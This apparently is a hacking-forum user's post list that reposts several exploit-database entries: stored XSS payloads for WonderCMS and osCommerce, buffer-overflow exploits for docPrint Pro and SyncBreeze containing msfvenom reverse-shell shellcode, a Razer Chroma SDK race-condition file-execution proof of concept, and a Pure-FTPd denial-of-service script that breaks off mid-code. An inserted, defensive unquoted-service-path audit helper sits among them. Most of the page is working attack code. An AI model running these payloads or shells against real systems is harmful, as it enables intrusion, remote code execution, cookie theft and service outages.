HireHackking

Everything posted by HireHackking

  1. # Exploit Title: WonderCMS 3.1.3 - 'page' Persistent Cross-Site Scripting
     # Date: 20-11-2020
     # Exploit Author: Mayur Parmar
     # Vendor Homepage: https://www.wondercms.com/
     # Version: 3.1.3
     # Tested on: PopOS

     Stored Cross-site scripting (XSS):
     Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent XSS.

     Attack vector:
     This vulnerability allows an attacker to inject an XSS payload in Page keywords; each time any user visits the website the XSS triggers, and the attacker is able to steal the cookie according to the crafted payload.

     Vulnerable Parameters: Page Title.

     Steps-To-Reproduce:
     1. Go to the Simple website builder.
     2. Put this payload in Page keywords: Mayur"><img src=x onerror=confirm("XSS")>
     3. Now go to the website and the XSS will be triggered.
  2. # Exploit Title: docPrint Pro 8.0 - 'Add URL' Buffer Overflow (SEH Egghunter)
     # Date: 2020-07-26
     # Exploit Author: MasterVlad
     # Vendor Homepage: http://www.verypdf.com
     # Software Link: http://dl.verypdf.net/docprint_pro_setup.exe
     # Version: 8.0
     # Vulnerability Type: Local Buffer Overflow
     # Tested on: Windows 7 32-bit

     # Proof of Concept:
     # 1. Run the python script
     # 2. Open exploit.txt and copy the content to clipboard
     # 3. Open doc2pdf_win.exe and go to File -> Add URL
     # 4. Paste the clipboard into the field and click on Ok

     #!/usr/bin/python

     # encoded egghunter
     egg = "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x54\x58\x66\x05\x44\x17\x50\x5c\x25\x4A"
     egg += "\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x01\x7F\x01\x2D\x0B\x01\x7F\x01\x2D\x01\x16\x02\x15\x50"
     egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x7F\x01\x01\x2D\x50\x0B\x14\x4F\x50"
     egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x7F\x01\x01\x2D\x51\x29\x73\x04\x50"
     egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x01\x01\x2C\x50\x2D\x10\x46\x7F\x7F\x50"
     egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x45\x7B\x26\x0C\x2D\x7F\x7F\x7F\x7F\x50"
     egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x7F\x28\x01\x52\x2D\x7F\x7F\x31\x7F\x50"
     egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x72\x4D\x3D\x16\x2D\x7F\x70\x70\x7F\x50"
     egg += "\x25\x4A\x4D\x4E\x54\x25\x35\x32\x31\x2B\x2D\x1A\x7B\x01\x7F\x2D\x7F\x01\x33\x7F\x2D\x01\x02\x01\x02\x50"

     # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.164.129 LPORT=443 -b "\x00\x0a\x0d\x13\x14\x15\x16" -f py -e x86/alpha_mixed BufferRegister=EDI
     buf = ""
     buf += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
     buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
     buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
     buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
     buf += "\x69\x6c\x68\x68\x6e\x62\x55\x50\x45\x50\x43\x30\x63"
     buf += "\x50\x6e\x69\x6a\x45\x45\x61\x59\x50\x55\x34\x4e\x6b"
     buf += "\x52\x70\x76\x50\x6c\x4b\x73\x62\x76\x6c\x6c\x4b\x70"
     buf += "\x52\x42\x34\x6e\x6b\x43\x42\x75\x78\x64\x4f\x48\x37"
     buf += "\x42\x6a\x71\x36\x65\x61\x39\x6f\x6e\x4c\x67\x4c\x53"
     buf += "\x51\x71\x6c\x76\x62\x56\x4c\x67\x50\x79\x51\x78\x4f"
     buf += "\x36\x6d\x43\x31\x79\x57\x6d\x32\x4c\x32\x72\x72\x66"
     buf += "\x37\x6e\x6b\x72\x72\x56\x70\x6e\x6b\x32\x6a\x75\x6c"
     buf += "\x4e\x6b\x62\x6c\x37\x61\x33\x48\x69\x73\x43\x78\x56"
     buf += "\x61\x38\x51\x50\x51\x4e\x6b\x71\x49\x31\x30\x57\x71"
     buf += "\x4b\x63\x6e\x6b\x71\x59\x37\x68\x68\x63\x57\x4a\x50"
     buf += "\x49\x6e\x6b\x75\x64\x4e\x6b\x43\x31\x68\x56\x35\x61"
     buf += "\x59\x6f\x6e\x4c\x69\x51\x48\x4f\x36\x6d\x55\x51\x6f"
     buf += "\x37\x65\x68\x4b\x50\x70\x75\x69\x66\x73\x33\x51\x6d"
     buf += "\x6a\x58\x35\x6b\x63\x4d\x76\x44\x54\x35\x4d\x34\x43"
     buf += "\x68\x4e\x6b\x70\x58\x37\x54\x76\x61\x59\x43\x62\x46"
     buf += "\x6c\x4b\x54\x4c\x72\x6b\x6e\x6b\x51\x48\x35\x4c\x35"
     buf += "\x51\x79\x43\x6c\x4b\x43\x34\x6c\x4b\x63\x31\x68\x50"
     buf += "\x6d\x59\x57\x34\x76\x44\x67\x54\x31\x4b\x51\x4b\x33"
     buf += "\x51\x71\x49\x72\x7a\x50\x51\x79\x6f\x69\x70\x43\x6f"
     buf += "\x63\x6f\x33\x6a\x6e\x6b\x65\x42\x48\x6b\x6c\x4d\x31"
     buf += "\x4d\x50\x68\x45\x63\x55\x62\x73\x30\x75\x50\x30\x68"
     buf += "\x44\x37\x73\x43\x45\x62\x43\x6f\x43\x64\x45\x38\x42"
     buf += "\x6c\x53\x47\x46\x46\x63\x37\x69\x6f\x69\x45\x48\x38"
     buf += "\x4a\x30\x45\x51\x57\x70\x55\x50\x67\x59\x49\x54\x70"
     buf += "\x54\x32\x70\x42\x48\x44\x69\x6d\x50\x70\x6b\x67\x70"
     buf += "\x79\x6f\x6b\x65\x66\x30\x30\x50\x70\x50\x32\x70\x43"
     buf += "\x70\x72\x70\x67\x30\x62\x70\x75\x38\x58\x6a\x36\x6f"
     buf += "\x49\x4f\x79\x70\x69\x6f\x48\x55\x4c\x57\x53\x5a\x56"
     buf += "\x65\x52\x48\x79\x50\x79\x38\x4f\x54\x6d\x51\x52\x48"
     buf += "\x43\x32\x53\x30\x63\x31\x4d\x6b\x6d\x59\x38\x66\x30"
     buf += "\x6a\x66\x70\x43\x66\x53\x67\x61\x78\x5a\x39\x6e\x45"
     buf += "\x72\x54\x33\x51\x59\x6f\x58\x55\x4b\x35\x59\x50\x44"
     buf += "\x34\x66\x6c\x69\x6f\x32\x6e\x65\x58\x31\x65\x4a\x4c"
     buf += "\x50\x68\x6a\x50\x68\x35\x39\x32\x73\x66\x49\x6f\x58"
     buf += "\x55\x62\x48\x42\x43\x32\x4d\x73\x54\x57\x70\x6b\x39"
     buf += "\x39\x73\x66\x37\x76\x37\x42\x77\x55\x61\x49\x66\x50"
     buf += "\x6a\x54\x52\x73\x69\x70\x56\x78\x62\x49\x6d\x32\x46"
     buf += "\x49\x57\x57\x34\x51\x34\x65\x6c\x53\x31\x65\x51\x4c"
     buf += "\x4d\x52\x64\x61\x34\x32\x30\x6b\x76\x47\x70\x72\x64"
     buf += "\x51\x44\x42\x70\x42\x76\x46\x36\x43\x66\x77\x36\x42"
     buf += "\x76\x62\x6e\x32\x76\x71\x46\x70\x53\x46\x36\x33\x58"
     buf += "\x61\x69\x58\x4c\x35\x6f\x6b\x36\x6b\x4f\x4b\x65\x4d"
     buf += "\x59\x49\x70\x30\x4e\x31\x46\x33\x76\x6b\x4f\x66\x50"
     buf += "\x71\x78\x43\x38\x4b\x37\x37\x6d\x73\x50\x6b\x4f\x4b"
     buf += "\x65\x6f\x4b\x48\x70\x6c\x75\x4f\x52\x72\x76\x73\x58"
     buf += "\x49\x36\x6e\x75\x4d\x6d\x4d\x4d\x59\x6f\x39\x45\x55"
     buf += "\x6c\x63\x36\x53\x4c\x66\x6a\x4d\x50\x79\x6b\x6b\x50"
     buf += "\x64\x35\x46\x65\x6f\x4b\x72\x67\x45\x43\x50\x72\x70"
     buf += "\x6f\x32\x4a\x65\x50\x51\x43\x49\x6f\x59\x45\x41\x41"

     exploit = "A"*3876
     exploit += "\x74\x06\x75\x04"
     # 0x1001062d - pop pop ret - reg.dll
     exploit += "\x2d\x06\x01\x10"
     exploit += egg
     exploit += "D"*(10000-3884-len(egg)-len(buf)-8)
     exploit += "T00WT00W"
     exploit += buf

     f = open("exploit.txt", "w")
     f.write(exploit)
     f.close()
  3. # Exploit Title: Wondershare Driver Install Service help 10.7.1.321 - 'ElevationService' Unquote Service Path
     # Date: 2020-11-24
     # Exploit Author: Luis Sandoval
     # Vendor Homepage: https://www.wondershare.com/
     # Software Link: https://www.wondershare.com/drfone/
     # Version: 10.7.1.321
     # Tested on: Windows 10 Home Single Language x64 Esp

     # Service info:

     C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
     Wondershare Driver Install Service help  ElevationService  C:\Program Files (x86)\Wondershare\Dr.Fone\Addins\Recovery\ElevationService.exe  Auto

     C:\Users\user>sc qc ElevationService
     [SC] QueryServiceConfig CORRECTO

     NOMBRE_SERVICIO: ElevationService
             TIPO               : 10  WIN32_OWN_PROCESS
             TIPO_INICIO        : 2   AUTO_START
             CONTROL_ERROR      : 1   NORMAL
             NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Wondershare\Dr.Fone\Addins\Recovery\ElevationService.exe
             GRUPO_ORDEN_CARGA  :
             ETIQUETA           : 0
             NOMBRE_MOSTRAR     : Wondershare Driver Install Service help
             DEPENDENCIAS       :
             NOMBRE_INICIO_SERVICIO: LocalSystem
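An added audit helper for the unquoted-path finding above; it is not part of the post and not Wondershare's or the author's code. It parses an `sc qc` dump like the one quoted, flags an image path that is unquoted and contains spaces, lists the locations Windows would try first so their ACLs can be checked, and prints the `sc config` command that quotes the path. The sample dump, the English/Spanish label pairs and the candidate-path rule (modelled on documented CreateProcess behaviour) are assumptions of the example.

```python
import re

# Constructed sample modelled on the `sc qc` dump in the post above; not live output.
SAMPLE_SC_QC = """\
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: ElevationService
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        NOMBRE_RUTA_BINARIO: C:\\Program Files (x86)\\Wondershare\\Dr.Fone\\Addins\\Recovery\\ElevationService.exe
        NOMBRE_MOSTRAR     : Wondershare Driver Install Service help
        NOMBRE_INICIO_SERVICIO: LocalSystem
"""

# `sc qc` labels are localised; the English labels and the Spanish ones from the post are recognised.
_NAME_RE = re.compile(r"^(?:SERVICE_NAME|NOMBRE_SERVICIO):\s*(\S+)", re.M)
_PATH_RE = re.compile(r"^\s*(?:BINARY_PATH_NAME|NOMBRE_RUTA_BINARIO)\s*:\s*(.+?)\s*$", re.M)


def parse_sc_qc(output):
    """Return (service_name, image_path) from an `sc qc` dump, or raise ValueError."""
    name, path = _NAME_RE.search(output), _PATH_RE.search(output)
    if not name or not path:
        raise ValueError("not an sc qc dump")
    return name.group(1), path.group(1)


def executable_part(image_path):
    """Drop service arguments: for an unquoted path the executable ends at the first '.exe'."""
    m = re.match(r"(.+?\.exe)\b", image_path, re.I)
    return m.group(1) if m else image_path


def is_unquoted_with_spaces(image_path):
    """True when the path is not wrapped in double quotes and the executable path contains a space."""
    if image_path.startswith('"'):
        return False
    return " " in executable_part(image_path)


def hijack_candidates(image_path):
    """Locations the service control manager would try before the real image: CreateProcess
    splits an unquoted command line at each space and appends .exe (assumption of this
    example: the rule is applied at every space of the executable path). A defender should
    confirm that none of these locations is writable by standard users."""
    if image_path.startswith('"'):
        return []
    exe = executable_part(image_path)
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def remediation(service, image_path):
    """`sc config` command that quotes the image path; inner quotes are escaped for cmd.exe."""
    return 'sc config %s binPath= "\\"%s\\""' % (service, image_path)


def audit(sc_qc_output):
    """Audit one service dump; returns a dict a script can log or turn into a ticket."""
    service, path = parse_sc_qc(sc_qc_output)
    unquoted = is_unquoted_with_spaces(path)
    return {
        "service": service,
        "path": path,
        "unquoted": unquoted,
        "candidates": hijack_candidates(path) if unquoted else [],
        "fix": remediation(service, path) if unquoted else None,
    }


if __name__ == "__main__":
    for key, value in audit(SAMPLE_SC_QC).items():
        print("%-10s %s" % (key, value))
```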
  4. # Exploit Title: SyncBreeze 10.0.28 - 'password' Remote Buffer Overflow
     # Date: 18-Sep-2020
     # Exploit Author: Abdessalam king(A.salam)
     # Vendor Homepage: http://www.syncbreeze.com
     # Software Link: http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.0.28.exe
     # Version: 10.0.28
     # Tested on: Windows 7,windows xp,windows 10

     #72413372 [*] Exact match at offset 520
     #jmp esp FFE4 \xff\xe4
     #!mona modules
     #!mona find -s "\xff\xe4" -m libspp.dll
     #address esp => 10090C83
     #badchars ==> "\x00\x0a\x0d\x25\x26\x2b\x3d"
     #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.199 LPORT=1337 -f c -b "\x00\x0a\x0d\x25\x26\x2b\x3d" EXITFUNC=thread

     #!/usr/bin/python
     import socket

     shell =""
     shell +="\xba\x4b\x38\x98\x39\xdd\xc7\xd9\x74\x24\xf4\x5f\x33\xc9\xb1"
     shell +="\x53\x83\xef\xfc\x31\x57\x10\x03\x57\x10\xa9\xcd\x64\xd1\xaf"
     shell +="\x2e\x95\x22\xcf\xa7\x70\x13\xcf\xdc\xf1\x04\xff\x97\x54\xa9"
     shell +="\x74\xf5\x4c\x3a\xf8\xd2\x63\x8b\xb6\x04\x4d\x0c\xea\x75\xcc"
     shell +="\x8e\xf0\xa9\x2e\xae\x3b\xbc\x2f\xf7\x21\x4d\x7d\xa0\x2e\xe0"
     shell +="\x92\xc5\x7a\x39\x18\x95\x6b\x39\xfd\x6e\x8a\x68\x50\xe4\xd5"
     shell +="\xaa\x52\x29\x6e\xe3\x4c\x2e\x4a\xbd\xe7\x84\x21\x3c\x2e\xd5"
     shell +="\xca\x93\x0f\xd9\x39\xed\x48\xde\xa1\x98\xa0\x1c\x5c\x9b\x76"
     shell +="\x5e\xba\x2e\x6d\xf8\x49\x88\x49\xf8\x9e\x4f\x19\xf6\x6b\x1b"
     shell +="\x45\x1b\x6a\xc8\xfd\x27\xe7\xef\xd1\xa1\xb3\xcb\xf5\xea\x60"
     shell +="\x75\xaf\x56\xc7\x8a\xaf\x38\xb8\x2e\xbb\xd5\xad\x42\xe6\xb1"
     shell +="\x02\x6f\x19\x42\x0c\xf8\x6a\x70\x93\x52\xe5\x38\x5c\x7d\xf2"
     shell +="\x3f\x77\x39\x6c\xbe\x77\x3a\xa4\x05\x23\x6a\xde\xac\x4b\xe1"
     shell +="\x1e\x50\x9e\x9c\x15\xf7\x70\x83\xd7\x6d\x71\x29\x2a\x1a\x9b"
     shell +="\xa2\xf5\x3a\xa4\x68\x9e\xd3\x58\x93\xbe\xb3\xd5\x75\xaa\xa3"
     shell +="\xb3\x2e\x43\x06\xe0\xe6\xf4\x79\xc3\x8c\x3b\xf0\xb3\xd9\xd3"
     shell +="\x4c\xaa\xde\xdc\x4c\xf9\x48\x4b\xc7\xed\x4c\x6a\xd8\x38\xe5"
     shell +="\xfb\x4f\xb7\x64\x49\xf1\xc8\xac\x3b\xf1\x5c\x4b\xea\xa6\xc8"
     shell +="\x51\xcb\x81\x57\xa9\x3e\x92\x9f\x55\xbf\xb8\xd4\x60\x55\x83"
     shell +="\x82\x8c\xb9\x03\x52\xdb\xd3\x03\x3a\xbb\x87\x57\x5f\xc4\x1d"
     shell +="\xc4\xcc\x51\x9e\xbd\xa1\xf2\xf6\x43\x9c\x35\x59\xbb\xcb\x45"
     shell +="\x9e\x43\x8d\x4e\x5e\x87\x58\x97\x15\xee\x59\xac\x36\xed\x77"
     shell +="\xd9\xde\xa8\x12\x60\x83\x4a\xc9\xa7\xba\xc8\xfb\x57\x39\xd0"
     shell +="\x8e\x52\x05\x56\x63\x2f\x16\x33\x83\x9c\x17\x16"

     payload = "username=AAAAA&password="+"A"*520+"\x83\x0c\x09\x10"+ "\x90" * 20 + shell +"\x90"*(1400-520-4-20-len(shell))

     req =""
     req += "POST /login HTTP/1.1\r\n"
     req += "Host: 192.168.1.20\r\n"
     req += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0\r\n"
     req += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
     req += "Accept-Language: en-US,en;q=0.5\r\n"
     req += "Accept-Encoding: gzip, deflate\r\n"
     req += "Referer: http://192.168.1.20/login\r\n"
     req += "Content-Type: application/x-www-form-urlencoded\r\n"
     req += "Content-Length: "+str(len(payload))+"\r\n"
     req += "Connection: keep-alive\r\n"
     req += "Upgrade-Insecure-Requests: 1\r\n"
     req += "\r\n"
     req += payload
     # print req

     s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
     s.connect(("192.168.1.20",80))
     s.send(req)
     print s.recv(1024)
     s.close()
  5. # Exploit Title: osCommerce 2.3.4.1 - 'title' Persistent Cross-Site Scripting
     # Date: 2020-11-19
     # Exploit Author: Emre Aslan
     # Vendor Homepage: https://www.oscommerce.com/
     # Version: 2.3.4.1
     # Tested on: Windows & XAMPP

     ==> Tutorial <==
     1- Login to admin panel.
     2- Go to the following url. ==> http(s)://(HOST)/catalog/admin/newsletters.php?action=new
     3- Enter the XSS payload into the title section and save it.

     ==> Vulnerable Parameter <==
     title= (post parameter)

     ==> HTTP Request <==
     POST /catalog/admin/newsletters.php?action=insert HTTP/1.1
     Host: (HOST)
     Connection: keep-alive
     Content-Length: 123
     Cache-Control: max-age=0
     Upgrade-Insecure-Requests: 1
     Origin: http://(HOST)/
     Content-Type: application/x-www-form-urlencoded
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
     Sec-Fetch-Site: same-origin
     Sec-Fetch-Mode: navigate
     Sec-Fetch-User: ?1
     Sec-Fetch-Dest: document
     Referer: http://(HOST)/catalog/admin/newsletters.php?action=new
     Accept-Encoding: gzip, deflate, br
     Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
     Cookie: osCAdminID=s11ou44m0vrasducn78c6sg

     module=newsletter&title="><img src=1 href=1 onerror="javascript:alert(document.cookie)"></img>&content=xss

     ==> Vulnerable Source Code <==
     <div id="contentText">
       <table border="0" width="100%" cellspacing="0" cellpadding="2">
         <tr>
           <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
             <tr>
               <td class="pageHeading">Newsletter Manager</td>
               <td class="pageHeading" align="right"><img src="images/pixel_trans.gif" border="0" alt="" width="57" height="40" /></td>
             </tr>
           </table></td>
         </tr>
         <tr>
           <td><table border="0" width="100%" cellspacing="0" cellpadding="0">
             <tr>
               <td valign="top"><table border="0" width="100%" cellspacing="0" cellpadding="2">
                 <tr class="dataTableHeadingRow">
                   <td class="dataTableHeadingContent">Newsletters</td>
                   <td class="dataTableHeadingContent" align="right">Size</td>
                   <td class="dataTableHeadingContent" align="right">Module</td>
                   <td class="dataTableHeadingContent" align="center">Sent</td>
                   <td class="dataTableHeadingContent" align="center">Status</td>
                   <td class="dataTableHeadingContent" align="right">Action&nbsp;</td>
                 </tr>
                 <tr id="defaultSelected" class="dataTableRowSelected" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=2&action=preview'">
                   <td class="dataTableContent"><a href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=2&action=preview"><img src="images/icons/preview.gif" border="0" alt="Preview" title="Preview" /></a>&nbsp;"><img src=1 href=1 onerror="javascript:alert(document.cookie)"></img></td>
                   <td class="dataTableContent" align="right">3 bytes</td>
                   <td class="dataTableContent" align="right">newsletter</td>
                   <td class="dataTableContent" align="center"><img src="images/icons/cross.gif" border="0" alt="False" title="False" /></td>
                   <td class="dataTableContent" align="center"><img src="images/icons/unlocked.gif" border="0" alt="Unlocked" title="Unlocked" /></td>
                   <td class="dataTableContent" align="right"><img src="images/icon_arrow_right.gif" border="0" alt="" />&nbsp;</td>
                 </tr>
                 <tr class="dataTableRow" onmouseover="rowOverEffect(this)" onmouseout="rowOutEffect(this)" onclick="document.location.href='http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=1'">
                   <td class="dataTableContent"><a href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=1&action=preview"><img src="images/icons/preview.gif" border="0" alt="Preview" title="Preview" /></a>&nbsp;"><img src=1 href=1 onerror="javascript:alert(1)"></img></td>
                   <td class="dataTableContent" align="right">7 bytes</td>
                   <td class="dataTableContent" align="right">newsletter</td>
                   <td class="dataTableContent" align="center"><img src="images/icons/cross.gif" border="0" alt="False" title="False" /></td>
                   <td class="dataTableContent" align="center"><img src="images/icons/unlocked.gif" border="0" alt="Unlocked" title="Unlocked" /></td>
                   <td class="dataTableContent" align="right"><a href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=1"><img src="images/icon_info.gif" border="0" alt="Info" title="Info" /></a>&nbsp;</td>
                 </tr>
                 <tr>
                   <td colspan="6"><table border="0" width="100%" cellspacing="0" cellpadding="2">
                     <tr>
                       <td class="smallText" valign="top">Displaying <strong>1</strong> to <strong>2</strong> (of <strong>2</strong> newsletters)</td>
                       <td class="smallText" align="right">Page 1 of 1</td>
                     </tr>
                     <tr>
                       <td class="smallText" align="right" colspan="2"><span class="tdbLink"><a id="tdb1" href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?action=new">New Newsletter</a></span><script type="text/javascript">$("#tdb1").button({icons:{primary:"ui-icon-plus"}}).addClass("ui-priority-secondary").parent().removeClass("tdbLink");</script></td>
                     </tr>
                   </table></td>
                 </tr>
               </table></td>
               <td width="25%" valign="top">
                 <table border="0" width="100%" cellspacing="0" cellpadding="2">
                   <tr class="infoBoxHeading">
                     <td class="infoBoxHeading"><strong>"><img src=1 href=1 onerror="javascript:alert(document.cookie)"></img></strong></td>
                   </tr>
                 </table>
                 <table border="0" width="100%" cellspacing="0" cellpadding="2">
                   <tr>
                     <td align="center" class="infoBoxContent"><span class="tdbLink"><a id="tdb2" href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=2&action=preview">Preview</a></span><script type="text/javascript">$("#tdb2").button({icons:{primary:"ui-icon-document"}}).addClass("ui-priority-secondary").parent().removeClass("tdbLink");</script><span class="tdbLink"><a id="tdb3" href="http://127.0.0.1:8080/oscommerce-2.3.4.1/catalog/admin/newsletters.php?page=1&nID=2&action=lock">Lock</a></span><script type="text/javascript">$("#tdb3").button({icons:{primary:"ui-icon-locked"}}).addClass("ui-priority-secondary").parent().removeClass("tdbLink");</script></td>
                   </tr>
                   <tr>
                     <td class="infoBoxContent"><br />Date Added: 11/19/2020</td>
                   </tr>
                 </table>
               </td>
             </tr>
           </table></td>
         </tr>
       </table>
     </div>
  6. Exploit Title: Razer Chroma SDK Server 3.16.02 - Race Condition Remote File Execution
     Date: 2020-08-13
     Exploit Author: Loke Hui Yi
     Vendor Homepage: https://razerid.razer.com
     Software Link: http://rzr.to/synapse-3-pc-download
     Version: <= v3.12.17
     Tested on: Windows 10
     CVE: CVE-2020-16602

     # More info can be found here:
     # https://www.angelystor.com/2020/09/cve-2020-16602-remote-file-execution-on.html
     # https://www.youtube.com/watch?v=fkESBVhIdIA

     # Remote attackers can register applications to the Chroma Server. If the attacker has write access to the ProgramData folder where the Chroma Server stores its data, he can exploit a race condition and get the server to execute a binary of his choosing.
     # The code below registers an application to the Chroma Server using a name of the attacker's choosing.
     # The attacker will need to pre-create a folder with the same name as the application to be registered in Razer Chroma SDK\Apps\<appname>, and create an exe file with the same application's name in that folder. The Apps folder is user writable and does not require admin privileges.
     # The attacker can keep running the code below to get the Server to execute the file while writing the payload to the target directory with another process (eg samba or ftp) in order to exploit the race condition.

     import requests
     import json

     def heartbeat(uri):
         print(uri + '/heartbeat')
         r = requests.put(uri + '/heartbeat', verify=False)
         print(r.text)

     def keyboard(uri):
         data = {
             "effect": "CHROMA_CUSTOM_KEY",
             "param": {
                 "color": [
                     [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535],
                     [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535],
                     [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535],
                     [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535],
                     [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535],
                     [255, 255, 255, 255, 255, 65280, 65280, 65280, 65280, 65280, 16711680, 16711680, 16711680, 16711680, 16711680, 16776960, 16776960, 16776960, 65535, 65535, 65535, 65535]
                 ],
                 "key": [
                     [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                     [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                     [0, 0, 0, (16777216 | ~255), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                     [0, 0, (16777216 | ~255), (16777216 | ~255), (16777216 | ~255), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
                     [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, (16777216 | ~16776960), 0, 0, 0, 0, 0],
                     [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, (16777216 | ~16776960), (16777216 | ~16776960), (16777216 | ~16776960), 0, 0, 0, 0]
                 ]
             }
         }
         print(uri + '/keyboard')
         r = requests.put(uri + '/keyboard', json=data, verify=False)
         print(r.text)

     text = "a"
     for x in range(20000):
         text += "a"

     pload = {
         "title": "APPNAME",
         "description": "description",
         "author": {
             "name": "name",
             "contact": "contact"
         },
         "device_supported": [
             "keyboard", "mouse", "headset", "mousepad", "keypad", "chromalink"],
         "category": "application"
     }

     server = 'https://chromasdk.io:54236/razer/chromasdk'
     r = requests.post(server, json=pload, verify=False)
     json_data = json.loads(r.text)
     print(json_data)
     uri = json_data['uri']
     heartbeat(uri)

     #uri = 'https://chromasdk.io:54236/sid=58487'
     heartbeat(uri)
     keyboard(uri)
     print(json_data['sessionid'])

     do_heartbeat = False
     if do_heartbeat:
         sid = 1
         uri = 'https://chromasdk.io:54236/sid=' + str(sid)  # sid is an int, so convert before concatenating
         heartbeat(uri)

     # PoC loop.py for race test
     '''
     import requests

     def copyfile(src, dst):
         with open(src, 'rb') as fsrc:
             with open(dst, 'wb') as fdst:
                 content = fsrc.read()
                 fdst.write(content)

     while True:
         try:
             print("copying")
             copyfile('pwn.exe', 'C:\\ProgramData\\Razer Chroma SDK\\Apps\\pwn\\pwn.exe')
         except Exception as e:
             print(str(e))
     '''
  7. # Exploit Title: Pure-FTPd 1.0.48 - Remote Denial of Service
     # Date: 2020. nov. 26., 09:32:17 CET
     # Exploit Author: xynmaps
     # Vendor Homepage: https://www.pureftpd.org/project/pure-ftpd/
     # Software Link: https://github.com/jedisct1/pure-ftpd/
     # Version: 1.0.48
     # Tested on: Parrot Security OS 5.9.0

     #encoding=utf8
     #__author__ = XYN/Dump/NSKB3
     #Pure-FTPd Denial of Service exploit by XYN/Dump/NSKB3.

     """
     Pure-FTPd only lets a certain amount of connections be made to the server, so, by repeatedly making new connections to the server, you can block other legitimate users from making a connection to the server, if the connections/ip isn't limited.
     (if it's limited, just run this script from different proxies using proxychains, and it will work)
     """

     import socket
     import sys
     import threading
     import subprocess
     import time

     banner = """
     ._________________.
     |    Pure-FTPd    |
     |      D o S      |
     |_________________|
     |By XYN/DUMP/NSKB3|
     |_|_____________|_|
     |_|_|_|_____|_|_|_|
     |_|_|_|_|_|_|_|_|_|
     """

     usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0])

     def test(t,p):
         s = socket.socket()
         s.settimeout(10)
         try:
             s.connect((t, p))
             response = s.recv(65535)
             s.close()
             return 0
         except socket.error:
             print("Port {} is not open, please specify a port that is open.".format(p))
             sys.exit()

     def attack(targ, po, id):
         try:
             subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
